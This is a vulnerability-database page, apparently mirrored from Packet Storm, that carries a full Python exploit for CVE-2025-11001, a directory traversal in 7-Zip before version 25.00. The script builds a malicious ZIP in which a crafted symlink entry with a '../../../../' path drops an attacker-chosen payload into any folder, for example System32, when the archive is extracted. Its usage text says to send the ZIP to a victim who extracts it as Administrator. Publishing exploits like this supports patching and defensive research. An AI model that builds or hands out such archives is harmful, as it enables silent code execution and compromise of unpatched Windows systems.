Lucene search
+L

📄 7-Zip Directory Traversal / Code Execution

🗓️ 10 Apr 2026 00:00:00Reported by Mohammed Idrees BanyamerType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 110 Views

7-Zip below 25.00 allows directory traversal via crafted ZIP to achieve remote code execution.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2025-11001
20 Nov 202504:16
githubexploit
GithubExploit
Exploit for CVE-2025-11001
22 Nov 202517:58
githubexploit
GithubExploit
Exploit for CVE-2025-11001
24 Nov 202513:55
githubexploit
GithubExploit
Exploit for CVE-2025-11001
14 Oct 202509:25
githubexploit
GithubExploit
Exploit for Path Traversal in 7-Zip
12 Dec 202516:49
githubexploit
GithubExploit
Exploit for CVE-2025-11001
15 Oct 202512:14
githubexploit
GithubExploit
Exploit for CVE-2025-11001
22 Nov 202510:13
githubexploit
Tenable Nessus
7-Zip < 25.00
23 Jul 202500:00
nessus
Tenable Nessus
Amazon Linux 2023 : p7zip, p7zip-plugins (ALAS2023-2025-1250)
28 Oct 202500:00
nessus
Tenable Nessus
Amazon Linux 2023 : 7zip, 7zip-reduced, 7zip-standalone (ALAS2023-2025-1251)
28 Oct 202500:00
nessus
Rows per page
# Exploit Title: 7-Zip < 25.00 - Directory Traversal to RCE via Malicious ZIP 
    # Date: 2025-11-22
    # Author: Mohammed Idrees Banyamer
    # Author Country: Jordan
    # Instagram: @banyamer_security
    # GitHub: https://github.com/mbanyamer
    # Vendor Homepage: https://www.7-zip.org
    # Software Link: https://www.7-zip.org/download.html
    # Version: 7-Zip < 25.00
    # Tested on: Windows 10 / Windows 11 (7-Zip 24.xx)
    # CVE: CVE-2025-11001
    # CVSS: 8.8 (High) - draft estimation
    # Category: Local Privilege Escalation / Remote Code Execution
    # Platform: Windows
    # CRITICAL: Yes - Public exploit available, active exploitation reported
    # Including: Directory Traversal via crafted symlink entry in ZIP archive
    # Impact: Full system compromise when extracting malicious archive with 7-Zip as Administrator
    # Fix: Upgrade to 7-Zip 25.00 or later
    # Advisory: https://www.7-zip.org/history.txt
    # Patch: https://github.com/ip7z/7zip/releases/tag/25.00
    # Target: Windows systems running vulnerable 7-Zip versions
    
    import struct
    import os
    import argparse
    import sys
    
    def build_zip(target_path, payload_file, output_zip):
        if not os.path.isfile(payload_file):
            print(f"[-] Payload file not found: {payload_file}")
            sys.exit(1)
    
        payload_name = os.path.basename(payload_file)
        payload_data = open(payload_file, "rb").read()
    
        target = target_path.replace("\\", "/").strip("/") + "/"
        traversal = "../../../../" + target
    
        with open(output_zip, "wb") as f:
            offset = 0
    
            symlink_name = "evil.lnk"
            symlink_target = traversal.encode() + b"\x00"
            symlink_extra = struct.pack("<HH", 0x756e, len(symlink_target)) + symlink_target
    
            symlink_header = struct.pack("<IHHHHHHIIIHH",
                0x04034b50, 20, 0x800, 0x800, 0, 0, 0,
                0, 0, 0,
                len(symlink_name), len(symlink_extra))
    
            f.write(symlink_header)
            f.write(symlink_name.encode())
            f.write(symlink_extra)
            f.write(b"")
            symlink_central_offset = offset
            offset += len(symlink_header) + len(symlink_name) + len(symlink_extra)
    
            payload_header = struct.pack("<IHHHHHHIIIHH",
                0x04034b50, 20, 0x800, 0, 0, 0,
                0, len(payload_data), len(payload_data),
                len(payload_name), 0)
    
            f.write(payload_header)
            f.write(payload_name.encode())
            f.write(payload_data)
            payload_central_offset = offset
            offset += len(payload_header) + len(payload_name) + len(payload_data)
    
            cd_offset = offset
    
            f.write(struct.pack("<IHHHHHHIIIHHHHHII",
                0x02014b50, 0x0317, 20, 0x800, 0, 0, 0,
                0, 0, 0,
                len(symlink_name), len(symlink_extra), 0, 0, 0, 0o777 << 16 | 0xA1ED, symlink_central_offset))
            f.write(symlink_name.encode())
            f.write(symlink_extra)
    
            f.write(struct.pack("<IHHHHHHIIIHHHHHII",
                0x02014b50, 0x0317, 20, 0x800, 0, 0, 0,
                0, len(payload_data), len(payload_data),
                len(payload_name), 0, 0, 0, 0, 0o777 << 16, payload_central_offset))
            f.write(payload_name.encode())
    
            f.write(struct.pack("<IHHHHIIH",
                0x06054b50, 0, 0, 2, 2, offset, cd_offset, 0))
    
        print(f"[+] Malicious archive created: {output_zip}")
        print(f"[+] Target path          : {target_path}")
        print(f"[+] Payload file         : {payload_name} ({len(payload_data)} bytes)")
        print(f"[+] Final write location : {target_path}\\{payload_name}")
        print("\n[*] Usage:")
        print("    1. Send the ZIP file to the victim")
        print("    2. Victim must run 7-Zip < 25.00 as Administrator")
        print("    3. Victim opens and extracts the ZIP → payload dropped silently")
        print("    4. Achievement unlocked")
    
    if __name__ == "__main__":
        banner = """
        CVE-2025-11001 - 7-Zip Directory Traversal PoC
        Author: Mohammed Idrees Banyamer (@banyamer_security)
        """
        print(banner)
    
        parser = argparse.ArgumentParser(description="CVE-2025-11001 Exploit - 7-Zip < 25.00")
        parser.add_argument("-t", "--target", required=True, help="Target directory (e.g. C:\\Windows\\System32)")
        parser.add_argument("-p", "--payload", required=True, help="Payload file to drop (e.g. C:\\Windows\\System32\\calc.exe)")
        parser.add_argument("-o", "--output", default="CVE-2025-11001-exploit.zip", help="Output ZIP filename (default: CVE-2025-11001-exploit.zip)")
    
        args = parser.parse_args()
    
        build_zip(args.target, args.payload, args.output)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Apr 2026 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.17.8
CVSS 37
EPSS0.27357
SSVC
110